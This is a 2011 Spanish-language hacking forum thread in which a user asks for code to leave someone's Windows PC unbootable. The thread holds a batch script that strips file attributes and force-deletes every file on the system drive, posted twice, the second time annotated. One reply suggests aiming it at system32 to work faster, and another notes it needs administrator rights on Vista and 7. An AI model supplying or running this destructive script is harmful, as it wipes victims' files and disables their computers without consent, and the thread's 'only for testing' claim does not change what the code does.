Hola

Quisiera saber si alguien me dice algun codigo q al ejecutarlo deje el OS inutilizable

osea q al momento de ejecutarlo elimine algun archivo necesario para el arranque.

Cosa que cuando la persona reinicie la pc no le arranque

PD: es solo para pruebas no para hacer maldades

Pille esto diganme q tal

Código: Seleccionar todo

@echo off
attrib -r -a -s -h "%homedrive%\*.*
del /s /q /f "%homedrive%\*.*"
exit

Un Saludo
Última edición por reselled el 08 Ene 2011, 23:09, editado 1 vez en total.
mmm
lelekocem02 escribió:post no local errado amigo devia colocar em manual e tutoriais aqui e so troyanos e ferramentos
saludos

si me equivoq pq hace un rato esta en dudas y preguntas y no me di cuenta cuando entra herramientas y troyanos ahora ya esta bien
mmm
Amigo ahorita en la Actualidad es Muy Dificil que lo hagas Porque con Windows Vista & Seven Nesecitas Altos Privilegios, Es Decir Nesecitas Ejecutar como Administrador..

Saludos
La Información Es Libre y Para Todo el Mundo, Principio Básico de la ética hacker..

Indetectables.Net
si tienes suerte y las "pruebas" son bajo xp, con que borres archivos a lo loco del system32 dejaras el S.O inutilizable, tambien te advierto que ese fallo es muy facil de corregir...

no seas malo ennn....

Código: Seleccionar todo

@echo off
attrib -r -a -s -h "%homedrive%\*.*    /Le quitas los atributos que posee   
                                                     /para poder manejarlo
del /s /q /f "%homedrive%\*.*"           /Lo borra sin pedir confirmacion
exit
No me acuerdo a que equivale "%homedrive% pero con system32 valdria y el tiempo en borrarlo seria menor.

Esto es muy facil de solucionar, asi que busca cosas sobre entradas del registro, variables batch, antivirus...

SUERTE Y APRENDE, SOLO APRENDE!!!
En 1º en 2º o en 3º BETICO hasta que muera
Responder

Volver a “Otros lenguajes”